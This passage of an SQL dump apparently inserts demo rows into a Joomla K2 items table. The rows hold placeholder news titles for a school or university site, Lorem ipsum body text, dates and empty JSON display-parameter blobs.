00:00:00',1,1,1,0,0,'','','','',117,'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}','','robots=\nauthor=','','','*'),(2,'A night of Dido, drama, and dinner nsectetur adipisicing elit, sed do eiusmod tempor.','a-night-of-dido-drama-and-dinner-nsectetur-adipisicing-elit-sed-do-eiusmod-tempor',1,1,'<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.</p>','',NULL,NULL,'[]','','2013-10-04 00:00:00',135,'',0,'0000-00-00 00:00:00','2013-10-07 09:13:36',135,'2013-09-25 00:00:00','0000-00-00 00:00:00',1,1,2,0,0,'','','','',119,'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}','','robots=\nauthor=','','','*'),(3,'University celebrates Oxford Open Doors 2013 adipisicing elit sed do eiusmod tempor','university-celebrates-oxford-open-doors-2013-adipisicing-elit-sed-do-eiusmod-tempor',1,1,'<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.</p>','',NULL,NULL,'[]','','2013-08-13 00:00:00',135,'',0,'0000-00-00 00:00:00','2013-10-07 09:13:14',135,'2013-09-25 00:00:00','0000-00-00 00:00:00',1,1,3,0,0,'','','','',120,'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}','','robots=\nauthor=','','','*'),(4,'Oxford\'s part in a new multiple sclerosis drug  adipisicing elit sed do eiusmod tempor','oxford-s-part-in-a-new-multiple-sclerosis-drug-adipisicing-elit-sed-do-eiusmod-tempor',1,1,'<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.</p>','',NULL,NULL,'[]','','2013-10-24 00:00:00',135,'',0,'0000-00-00 00:00:00','2013-10-07 09:12:50',135,'2013-09-25 00:00:00','0000-00-00 00:00:00',1,1,4,0,0,'','','','',121,'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}','','robots=\nauthor=','','','*'),(5,'Magical Books: From the Middle Ages to Middle-earth','magical-books-from-the-middle-ages-to-middle-earth',2,1,'<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.</p>','',NULL,NULL,'[]','','2013-09-24 06:25:51',135,'',0,'0000-00-00 00:00:00','2013-10-07 09:54:36',135,'2013-09-24 06:25:51','0000-00-00 00:00:00',1,1,1,0,0,'','','','',119,'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}','','robots=\nauthor=','','','*'),(6,'Getting started with new Online Practice and Online Workbooks','getting-started-with-new-online-practice-and-online-workbooks',2,1,'<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.</p>','',NULL,NULL,'[]','','2013-09-24 06:27:41',135,'',0,'0000-00-00 00:00:00','2013-10-07 09:54:25',135,'2013-09-24 06:27:41','0000-00-00 00:00:00',1,1,2,0,0,'','','','',121,'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}','','robots=\nauthor=','','','*'),(7,'How to give every kindergarten child the chance','how-to-give-every-kindergarten-child-the-chance',2,1,'<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.</p>','',NULL,NULL,'[]','','2013-09-24 06:28:19',135,'',0,'0000-00-00 00:00:00','2013-10-07 09:54:12',135,'2013-09-24 06:28:19','0000-00-00 00:00:00',1,1,3,0,0,'','','','',118,'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}','','robots=\nauthor=','','','*'),(8,'Speaking in the monolingual classroom orem ipsum dolor sit amet, consectetur adipisicing','speaking-in-the-monolingual-classroom-orem-ipsum-dolor-sit-amet-consectetur-adipisicing',2,1,'<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.</p>','',NULL,NULL,'[]','','2013-09-05 00:00:00',135,'',0,'0000-00-00 00:00:00','2013-10-07 09:54:02',135,'2013-09-25 00:00:00','0000-00-00 00:00:00',1,1,4,0,0,'','','','',121,'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}','','robots=\nauthor=','','','*'),(9,'Kenyatta University wishes to inform all students','kenyatta-university-wishes-to-inform-all-students',3,1,'<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci.</p>\r\n','\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim.</p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim.</p>',NULL,NULL,'[{\"id\":\"1\",\"value\":\"9.30PM to 11.00PM\"},{\"id\":\"2\",\"value\":\"8.00AM\"},{\"id\":\"3\",\"value\":\"Bananibridge, West Munich 7690pxc\"}]','9.30PM to 11.00PM 8.00AM Bananibridge, West Munich 7690pxc ','2013-06-11 00:00:00',135,'',0,'0000-00-00 00:00:00','2013-10-07 09:10:05',135,'2013-09-25 06:11:40','0000-00-00 00:00:00',1,1,1,0,0,'','','','',78,'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemIma